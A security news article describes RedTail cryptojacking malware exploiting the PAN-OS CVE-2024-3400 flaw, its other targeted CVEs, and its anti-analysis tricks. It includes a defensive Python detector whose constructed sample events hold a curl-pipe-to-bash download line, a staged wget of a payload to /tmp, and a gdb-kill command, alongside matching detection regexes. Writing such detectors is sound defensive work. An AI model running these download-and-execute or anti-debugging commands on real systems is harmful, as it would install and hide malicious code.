Alert: Palo Alto Networks Firewalls Targeted by RedTail Malware Exploits
In a recent development, the threat actors behind the RedTail cryptojacking malware have expanded their arsenal by exploiting a recently disclosed security flaw in Palo Alto Networks firewalls. The vulnerability, which affects PAN-OS, was quickly added to the RedTail toolkit, and the malware now also features enhanced anti-analysis techniques, according to Akamai's web infrastructure and security team.
Exploitation of PAN-OS Vulnerability
According to Akamai security researchers Ryan Barnett, Stiv Kupchik, and Maxim Zavodchik, the attackers have also refined their tactics by using private crypto-mining pools, which give them greater control over mining outcomes at the cost of higher operational and financial overhead.
The RedTail operators target a now-patched PAN-OS vulnerability (CVE-2024-3400, CVSS score 10.0), a command injection flaw in the GlobalProtect feature that lets an unauthenticated attacker execute arbitrary code with root privileges on the firewall.
RedTail Malware
Once the vulnerability is exploited, the attackers run commands that download and execute a bash script from an external domain; that script in turn downloads the RedTail payload matching the CPU architecture of the compromised system.
RedTail Propagation Methods
RedTail propagates through multiple methods, exploiting known security flaws in a range of devices and software, including:
- TP-Link routers (CVE-2023-1389)
- ThinkPHP (CVE-2018-20062)
- Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887)
- VMware Workspace ONE Access and Identity Manager (CVE-2022-22954)
First documented by security researcher Patryk Machowiak in January 2024, RedTail initially exploited the Log4Shell vulnerability (CVE-2021-44228) to infiltrate Unix-based systems. By March 2024, Barracuda Networks had reported that flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) were being used to install Mirai botnet variants, and that ThinkPHP vulnerabilities were being leveraged to deploy RedTail.
Enhanced Evasion and Persistence Techniques
The latest version of RedTail, detected in April 2024, introduces significant updates. The malware now carries an encrypted mining configuration that it uses to launch its embedded XMRig miner. Notably, this version contains no cryptocurrency wallet, which suggests a shift to private mining pools or mining proxies in order to maximize financial gain.
The configuration changes reflect the attackers' efforts to optimize their mining operations and show a deep understanding of crypto-mining. The new variant also employs evasion and persistence techniques that are unusual for cryptojacking malware: it forks itself multiple times to hinder debugging and kills any instances of the GNU Debugger (gdb) it detects. Akamai's analysis describes a level of sophistication uncommon among typical cryptocurrency-mining malware.
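As an added illustration of the behaviour described in the two passages above (the architecture-specific staging chain that follows exploitation, and the self-forking, gdb-killing evasion of the newest variant), here is a small heuristic detector written for this page; it is not code from Akamai or from the RedTail analysis. It runs over process-execution events of the form pid/ppid/image/cmdline, such as an EDR or auditd pipeline would produce. The event schema, the `.invalid` hostnames, the file names and every sample line are constructed for the demonstration and are not RedTail indicators.

```python
"""Heuristic detector for a download-and-stage chain followed by anti-debugging
behaviour, run over constructed process-execution events.

Added example for this page, not vendor or Akamai tooling. Every event below
is constructed; hostnames use the reserved .invalid TLD and nothing here is a
real RedTail indicator. Thresholds are illustrative and must be tuned."""
import re
from collections import Counter
from typing import Dict, List

Event = Dict[str, object]

# A downloader whose output is piped straight into a shell (stage-1 dropper).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|dash)\b")
# The dropper probing the CPU architecture before choosing a payload.
ARCH_PROBE = re.compile(r"\buname\s+-m\b")
# Architecture tokens commonly embedded in a per-arch payload name or URL.
ARCH_TOKEN = re.compile(r"(x86_64|amd64|aarch64|arm64|armv\d|i[3-6]86|mips\w*)", re.I)
# Any attempt to kill the GNU Debugger.
DEBUGGER_KILL = re.compile(r"\b(pkill|killall|kill)\b.*\bgdb\b")
DOWNLOADERS = {"curl", "wget"}
# Children whose image equals the parent's image; legitimate shells nest a
# little, so require a chain at least this long before flagging.
SELF_FORK_THRESHOLD = 3

# Constructed sample: one malicious chain (pids 101-109) plus benign noise.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 100, "ppid": 1,   "image": "sshd",    "cmdline": "sshd: admin [priv]"},
    {"pid": 101, "ppid": 100, "image": "bash",    "cmdline": 'bash -c "curl -s http://example.invalid/setup.sh | bash"'},
    {"pid": 102, "ppid": 101, "image": "bash",    "cmdline": "bash"},
    {"pid": 103, "ppid": 102, "image": "uname",   "cmdline": "uname -m"},
    {"pid": 104, "ppid": 102, "image": "wget",    "cmdline": "wget -q http://example.invalid/payload-x86_64 -O /tmp/.x"},
    {"pid": 105, "ppid": 102, "image": ".x",      "cmdline": "/tmp/.x"},
    {"pid": 106, "ppid": 105, "image": ".x",      "cmdline": "/tmp/.x"},
    {"pid": 107, "ppid": 106, "image": ".x",      "cmdline": "/tmp/.x"},
    {"pid": 108, "ppid": 107, "image": ".x",      "cmdline": "/tmp/.x"},
    {"pid": 109, "ppid": 108, "image": "pkill",   "cmdline": "pkill -9 gdb"},
    {"pid": 110, "ppid": 1,   "image": "apt-get", "cmdline": "apt-get update"},
    {"pid": 111, "ppid": 110, "image": "wget",    "cmdline": "wget http://mirror.example.invalid/Release"},
    {"pid": 112, "ppid": 100, "image": "bash",    "cmdline": "bash"},
]


def detect(events: List[Event]) -> List[Dict[str, object]]:
    """Return one finding per matched rule; an empty list means nothing fired."""
    findings: List[Dict[str, object]] = []
    by_pid = {e["pid"]: e for e in events}

    # Rules that need only the command line of a single event.
    for e in events:
        cmd = str(e["cmdline"])
        if PIPE_TO_SHELL.search(cmd):
            findings.append({"rule": "pipe_to_shell", "pid": e["pid"]})
        if DEBUGGER_KILL.search(cmd):
            findings.append({"rule": "debugger_kill", "pid": e["pid"]})

    # Arch-staged fetch: a downloader pulling an arch-named file from the same
    # parent that ran "uname -m". Benign downloads under other parents pass.
    probe_parents = {e["ppid"] for e in events if ARCH_PROBE.search(str(e["cmdline"]))}
    for e in events:
        if (e["image"] in DOWNLOADERS and e["ppid"] in probe_parents
                and ARCH_TOKEN.search(str(e["cmdline"]))):
            findings.append({"rule": "arch_staged_fetch", "pid": e["pid"]})

    # Self-fork chain: count children whose image matches their parent's image.
    self_forks: Counter = Counter()
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is not None and parent["image"] == e["image"]:
            self_forks[e["image"]] += 1
    for image, n in self_forks.items():
        if n >= SELF_FORK_THRESHOLD:
            findings.append({"rule": "self_fork_chain", "image": image, "count": n})

    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

The rules are deliberately independent so a partial chain (for example a dropper that never probes the architecture) still surfaces something; in production you would key the findings on the host and time window and raise the priority when several rules fire on one process tree, as they do on pids 101-109 in the sample.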
RedTail Malware Analysis
While the identity of the threat actors remains unclear, the use of private crypto-mining pools is reminiscent of tactics employed by the North Korea-linked Lazarus Group, known for extensive, financially motivated cyberattacks. Akamai's researchers suggest that the complexity and resources required to operate a private mining pool point to possible nation-state sponsorship.
"The investments necessary for a private crypto-mining operation include significant staffing, infrastructure, and obfuscation," the researchers concluded, implying that RedTail's sophistication points to a highly organized and possibly state-sponsored threat group. Applying the PAN-OS fixes for CVE-2024-3400 promptly, and reviewing internet-exposed GlobalProtect firewalls for signs of compromise, is essential for maintaining robust network security.
Conclusion
The ongoing evolution of RedTail highlights the increasing sophistication of cyber threats targeting internet-facing network infrastructure. Organizations must remain vigilant and prioritize security updates to mitigate the enterprise risk posed by these attacks on edge devices. As threat actors continue to refine their tactics and expand their toolkits, the cybersecurity community must collaborate and innovate to stay ahead in this ever-changing landscape.
The sources for this piece include articles in The Hacker News and SC Media.